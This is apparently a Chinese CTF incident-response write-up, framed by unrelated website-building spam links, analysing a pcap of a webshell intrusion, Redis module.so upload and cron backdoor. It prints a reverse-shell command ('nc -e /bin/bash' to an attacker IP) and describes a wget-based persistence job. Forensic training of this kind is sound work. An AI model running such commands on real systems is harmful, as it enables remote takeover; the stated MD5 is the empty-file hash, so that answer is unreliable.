当前位置: 首页 > news >正文

网站需求分析的重要设计模板网站

网站需求分析的重要,设计模板网站,网站建设广告模板,大好网站文章目录一、前言二、索引三、题目列表步骤#1审计日志,攻击者下载恶意木马文件的 ip是多少 flag{ip}步骤#2审计流量包,木马文件连接密码是什么? flag{xxx}步骤#3审计流量包,攻击者反弹的IP和端口是什么? flag{ip:port}步骤#4提交黑客上传恶…

文章目录

    • 一、前言
    • 二、索引
    • 三、题目列表
      • 步骤#1
        • 审计日志,攻击者下载恶意木马文件的 ip是多少 flag{ip}
      • 步骤#2
        • 审计流量包,木马文件连接密码是什么? flag{xxx}
      • 步骤#3
        • 审计流量包,攻击者反弹的IP和端口是什么? flag{ip:port}
      • 步骤#4
        • 提交黑客上传恶意文件的 md5 md5sum xxx.so
      • 步骤#5
        • 攻击者在服务器内权限维持请求外部地址和恶意文件的地址 flag{http://xxxxxxxxxx/xx.xxx}

一、前言

题目简述:服务器有对外链接请求的痕迹,现提供一段 waf 上截获的数据包,分析对应的虚拟机环境跟数据包,找到关键字符串并且尝试修复漏洞

账号:root,密码:root123,流量包在/result.pcap

二、索引

三、题目列表

步骤#1

审计日志,攻击者下载恶意木马文件的 ip是多少 flag{ip}

先通过wireshark语法筛选出http流量

我们简单分析这个流量包,前面有大量的404状态码,表明黑客正在进行目录扫描。后面黑客发现了evil.php文件,但是不知道参数名是什么,对参数名进行了大量尝试,最后发现参数command可以执行命令

继续分析,可以看到黑客执行命令把shell.php下载到目标机器上

在这里插入图片描述

因此可知攻击者下载恶意木马文件的ip地址为192.168.150.253

flag{192.168.150.253}

步骤#2

审计流量包,木马文件连接密码是什么? flag{xxx}

继续向下分析,可以看到攻击者通过POST数据包与shell.php进行通信

在这里插入图片描述

因此连接密码就是cmd

flag{cmd}

步骤#3

审计流量包,攻击者反弹的IP和端口是什么? flag{ip:port}

也是刚才的流量,我们对其内容进行base64解码

在这里插入图片描述

发现@ini_set("display_errors", "0");@set_time_limit(0);,结合前面的特征,可以推断这是通过蚁剑连接的。继续分析流量,发现有个流量记录了外连命令,通过nc反弹shell获得控制权

因此攻击者反弹的IP和端口是192.168.150.199:4444

flag{192.168.150.199:4444}

步骤#4

提交黑客上传恶意文件的 md5 md5sum xxx.so

题目提示文件后缀是.so,我们直接wireshark语法搜索内容包含.so的流量

tcp and frame contains ".so"

可以看到通过redis主从复制上传了一个module.so动态链接库。前面的RESP协议是Redis 客户端和服务器之间通信使用的协议

那我们修改wireshark语法搜索RESP协议的流量

经过分析,前面上传的module.so文件有问题,加载模块后无法执行命令

后面上传了一个符合条件的module.so文件,成功执行系统命令

在这里插入图片描述

攻击者执行了命令nc -e /bin/bash 192.168.150.199 4444反弹shell,因此可以确定这个就是恶意文件

登录目标靶机,在根目录下计算该文件的 MD5 值即可

md5sum module.so

flag{d41d8cd98f00b204e9800998ecf8427e}

步骤#5

攻击者在服务器内权限维持请求外部地址和恶意文件的地址 flag{http://xxxxxxxxxx/xx.xxx}

攻击者要想在服务器内维持权限,肯定是有后门的。然后题目说请求的外部地址和恶意文件的地址,那说明是会定期向外部发送请求的,我们直接查看计划任务

cat /etc/crontab

成功发现黑客留下的后门,通过wget定期向恶意地址下载webshell到目标机器,频率为每分钟执行一次

flag{http://192.168.150.199:88/shell.php}
http://www.dtcms.com/a/460646.html

相关文章:

  • 2012系统 做网站佛山网站建设佛山网络推广
  • 个人作品网站策划书大航母网站建设在哪里
  • 东莞网站建设优化排名好看的网站首页图片
  • 做网站后端要什么技术国内电子商务网站有哪些
  • 微信网站特征wordpress更改登录地址
  • 河南制作网站jsp做的大型网站
  • 网上找兼职的网站做网站业务员如何跟客户沟通
  • 购物网站开发的背景介绍做网站的是不是程序员
  • 巢湖网 网站网站建没有前景
  • 网站源码建站视频广告东莞网站建设技术支持
  • 群晖服务器做网站怎么制作悬赏平台app
  • php mysql网站后台源码北京口碑好装修公司
  • 合肥市有做网站的公司吗关键词网站优化平台
  • 淄博桓台网站建设报价网站 301
  • 30个免费货源网站网站设计是后台做的还是前台做的
  • 广州网站建设服务哪家好用记事本做网站
  • 全屏响应式网站模板seo的搜索排名影响因素有哪些
  • 招聘网站报表怎么做百度手机版下载
  • 从化网站开发做网站为什么要用php框架
  • 洛阳市做网站贴吧公司建设网站费用会计怎么记
  • 网站建设科技微信小程序登陆入口官网
  • 宁波建设网 公积金网点seo顾问服务深圳
  • 微站是什么东西网站服务类型
  • 绍兴建站公司模板sinaappengine wordpress
  • 做网站+利润wordpress 后台管理模板
  • 挂机宝可以做网站创意视差wordpress主题
  • 源码网站怎么做兰州网站搜索排名
  • 学习php好的网站网站前端怎么做
  • 长春网站优化方案站长资源平台百度
  • 建设网站要花多少钱用pc做网站服务器为什么不如云主机